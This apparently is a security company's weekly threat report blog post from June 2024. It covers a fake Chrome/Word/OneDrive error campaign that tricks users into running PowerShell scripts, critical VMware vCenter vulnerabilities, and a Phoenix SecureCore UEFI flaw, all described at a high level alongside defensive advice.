Mia Davis
June 24, 2024
5 Min

Threat Report 24.06.24

Fake errors in Google Chrome, Word, and OneDrive run malicious scripts

Threat actors have launched a campaign tricking users of Google Chrome, Word, and OneDrive with a fake error page into running malicious scripts.

The Google Chrome variant of the attack begins when the user visits a compromised website that loads a malicious script which displays a fake Google Chrome warning stating that there was a problem loading the webpage. The instructions shown will guide the user into clicking a button to ‘Copy fix’, and then paste this into Windows PowerShell (Admin). When run, the script will perform various checks before deploying additional payloads. The Word and OneDrive variants function similarly.

Since the process requires significant user input, it’s important to remain vigilant about your actions, especially when running programs as admin. When in doubt, consult your IT or security team.

VMWare fixes critical vulnerabilities affecting vCenter Server and Cloud Foundation

VMWare has released fixes for critical vulnerabilities in their vCenter Server platform. The vCenter Server platform is a central management platform used to manage virtual machines and ESXi hosts for VMware vSphere. These vulnerabilities affect VMware vCenter Server versions 7.0 and 8.0 and VMware Cloud Foundation versions 4.x and 5.x.

The vulnerabilities are as follows:

  • CVE-2024-37079 - A heap-overflow vulnerability in the implementation of the DCERPC protocol that could allow a  malicious actor with network access to vCenter Server to achieve remote code execution by sending a specially crafted network packet.
  • CVE-2024-37080 - A heap-overflow vulnerability in the implementation of the DCERPC protocol that could allow a  malicious actor with network access to vCenter Server to achieve remote code execution by sending a specially crafted network packet.
  • CVE-2024-37081 - Multiple local privilege escalation vulnerabilities due to misconfiguration of sudo that could allow an authenticated local user with non-administrative privileges to elevate privileges to root on vCenter Server Appliance.

It’s recommended to update to the latest version of vCenter Server as soon as possible where these vulnerabilities are fixed.

Phoenix SecureCore UEFI vulnerability affects multiple families of Intel CPUs

Security researchers have released a report detailing a vulnerability in Phoenix SecureCore UEFI firmware, affecting multiple families of Intel CPUs. UEFI is a motherboard firmware which initialises hardware components and loads the operating system. This vulnerability affects devices using Phoenix SecureCore firmware on select Intel processor families, including AlderLake, CoffeeLake, CometLake, IceLake, JasperLake, KabyLake, MeteorLake, RaptorLake, RocketLake, and TigerLake.

The vulnerability, tracked as CVE-2024-0762, has a CVSS score of 7.5 and is a potential buffer overflow caused by unsafe UEFI variable handling that allows an attack to escalate privileges and perform code execution. The result of this can give threat actors ongoing persistence within the device and can often evade higher-level security measures in the operating system.

If you have identified your hardware as affected by this vulnerability, it is advised to consult vendor recommendations as to what measures should be taken.

Read similar blogs